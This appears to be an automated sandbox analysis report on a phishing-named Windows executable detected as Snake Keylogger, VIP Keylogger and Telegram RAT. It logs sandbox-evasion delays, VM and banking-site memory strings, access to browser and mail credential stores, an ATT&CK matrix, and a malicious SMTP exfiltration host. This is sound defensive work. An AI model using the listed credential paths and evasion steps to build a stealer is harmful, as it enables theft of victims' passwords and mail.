Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -596043s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -595718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -595390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -595172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -594843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964	Thread sleep time: -594625s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599543	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597795	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 596043	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Thread delayed: delay time: 594625	Jump to behavior

Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4705089204.0000000001016000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Code function: 3_2_068E9548 LdrInitializeThunk,

3_2_068E9548

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Process created: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe "C:\Users\user\Desktop\Request for Quotation Plug Valve.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Queries volume information: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Queries volume information: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4707717001.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4707717001.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Request for Quotation Plug Valve.exe	55%	ReversingLabs	Win32.Spyware.Snakekeylogger
Request for Quotation Plug Valve.exe	100%	Avira	HEUR/AGEN.1309290
Request for Quotation Plug Valve.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
us2.smtp.mailhostbox.com	208.91.199.223	true	true	unknown
